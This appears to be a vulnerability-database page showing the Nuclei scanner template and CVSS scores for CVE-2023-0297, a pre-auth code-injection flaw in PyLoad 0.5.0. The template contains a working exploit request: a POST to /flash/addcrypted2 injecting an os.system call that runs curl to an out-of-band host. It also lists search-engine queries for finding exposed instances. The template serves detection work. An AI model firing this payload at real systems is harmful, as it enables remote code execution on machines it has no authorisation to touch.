Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-0297
HistoryJul 04, 2023 - 12:51 p.m.

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

2023-07-0412:51:35
ProjectDiscovery
github.com
30
cve2023
rce
pyload
huntr
packetstorm
oast

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.9

Confidence

High

EPSS

0.606

Percentile

97.9%

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
id: CVE-2023-0297

info:
  name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
  author: MrHarshvardhan,DhiyaneshDk
  severity: critical
  description: |
    Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
  remediation: |
    Upgrade PyLoad to a version that is not affected by this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51532
    - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
    - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html
    - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0297
    cwe-id: CWE-94
    epss-score: 0.50964
    epss-percentile: 0.97545
    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pyload
    product: pyload
    shodan-query:
      - html:"pyload"
      - http.title:"login - pyload"
      - http.html:"pyload"
      - http.title:"pyload"
    fofa-query:
      - title="login - pyload"
      - body="pyload"
      - title="pyload"
    google-query:
      - intitle:"login - pyload"
      - intitle:"pyload"
    zoomeye-query:
      - app:"pyLoad"
      - app:"pyload"
  tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast
variables:
  cmd: "curl {{interactsh-url}}"

http:
  - raw:
      - |
        GET /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'JDownloader'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a0047304502206f42a22f61252e2e216b2da0de6ff006679e83223f67f0e46f3a67d89c42ca0b0221008addfe626672d575e4b1b69d460c06b3c03d2f4c37b7e1935016e81164341778:922c64590222798bb761d5b6d8e72950

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.9

Confidence

High

EPSS

0.606

Percentile

97.9%